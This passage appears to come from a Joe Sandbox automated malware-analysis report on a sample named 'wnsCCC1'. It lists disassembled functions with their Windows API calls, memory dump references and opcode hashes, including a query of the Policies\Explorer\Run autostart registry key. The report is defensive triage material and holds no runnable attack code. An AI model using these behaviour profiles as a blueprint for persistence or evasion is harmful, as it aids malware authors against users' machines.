                                                                                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                                                                                              • Opcode ID: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                              • Instruction ID: e56410310a72084f4d909e549713b6ef5e7faa8c618e51606751afd800fe69ca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55259a99b3f005bd62bd1eee31106c216fd46ae3fbea56f5e47295bb88c76c71
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28F0317064020CABDF206F60DD4EBEE3B69EB40319F00803AFA45B51D0DBF999598F99
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                                                              • Opcode ID: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                              • Instruction ID: cde632e975db2237da1c3b35629bcc1af8e7f74e244a4afe6fc019873d9bc44b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd5869cf8e01605dbba6f89003ab72911ed6556746709080781428bb81ff186
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921BFB1C00124BBCF116FA5DE48D9E7E79EF09324F10023AF9647A2E1CB794D418B98
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00446728), ref: 00404CC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %u.%u%s%s$(gD
                                                                                                                                                                                                              • API String ID: 3540041739-492854681
                                                                                                                                                                                                              • Opcode ID: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                              • Instruction ID: aaf23b967d3fcc40b536a7be4f54997d0d4b2484921d6e850771612597014f60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3064c8308b7509d1383c21e902e6820dcf1316d1410b3bc833d73e44a854a58c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D11EB73A0412837EB00556DAC45EDF3288EB85374F264237FA66F31D1E979CC5282E8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040667C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                              • CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                              • CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                              • String ID: *?|<>/":
                                                                                                                                                                                                              • API String ID: 589700163-165019052
                                                                                                                                                                                                              • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                              • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(0041E5D8), ref: 00401E3E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3808545654-0
                                                                                                                                                                                                              • Opcode ID: d45f834d171d725afd91ae9bb128b8c3c7dbb3b90b3bde5971021a52cdcc4ac4
                                                                                                                                                                                                              • Instruction ID: f94ea66f3bb0d18877d48f50851b2a4d43bd5926543aaa07d49364debbc8af75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d45f834d171d725afd91ae9bb128b8c3c7dbb3b90b3bde5971021a52cdcc4ac4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A601B575A04240BFF7009BF5AE0A7D9BFB5AB55309F10847DF642B61E2D97840858F2D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                              • Opcode ID: 82d477863e66f443ebd46b8e1e302b7a8e37783b84298c30bb4df0bf372e1380
                                                                                                                                                                                                              • Instruction ID: c4075bb9bfde8645d9c714665ee228779135434f852c8317c1fe236da41c92b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82d477863e66f443ebd46b8e1e302b7a8e37783b84298c30bb4df0bf372e1380
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0F0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D419B38
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                              • Opcode ID: 24084e1ee828c43313bede8142c405a0ca1b46cb638746800ee982a4d2c00c06
                                                                                                                                                                                                              • Instruction ID: 177e50295cc88f553b9a3067857c13a37c9039e473aa79b37457755941741264
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24084e1ee828c43313bede8142c405a0ca1b46cb638746800ee982a4d2c00c06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97219371948209AEEF05DFB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889809B18
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$Enum
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 464197530-0
                                                                                                                                                                                                              • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                                              • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405976
                                                                                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405995
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                                              • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                                                                                                              • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004053C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                                                                                                                • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                              • Opcode ID: 4753812dcda77c43f10e8ae772257530cbd3706fb24bd1d76dbcd04b27752b45
                                                                                                                                                                                                              • Instruction ID: 93d8fc7429a3309a4d5f32771a2db5550657aa0780c74b0d1fda1c3346d9b8f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4753812dcda77c43f10e8ae772257530cbd3706fb24bd1d76dbcd04b27752b45
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A01BC71100709ABDB205F01ED80BDB3A26EB9135AF604037FA00762E0C37A8CD29E6E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 004062B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000002,0043E708,00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?,?,0040652A,80000002), ref: 004062FC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,00000000,0043E708), ref: 00406307
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 004062BD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2227339617.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227312874.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227365379.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000040E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.0000000000412000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227402738.000000000045F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000014.00000002.2227684992.00000000004F1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_wnsCCC1.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
                                                                                                                                                                                                              • API String ID: 3356406503-3773729851
                                                                                                                                                                                                              • Opcode ID: 7e8f2b507172300fff4d18ea8023ba838134d56d13ff8a7450bb17b0ad457722
                                                                                                                                                                                                              • Instruction ID: 71396637bdf4209a45bd355f469bd078e3083f4a568c77181c36ba1a701e5b4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e8f2b507172300fff4d18ea8023ba838134d56d13ff8a7450bb17b0ad457722
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2701BC7250020AEBDF218F55CD0AEDB3FA8EF54364F01403AFD16A2190E378DA24CBA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
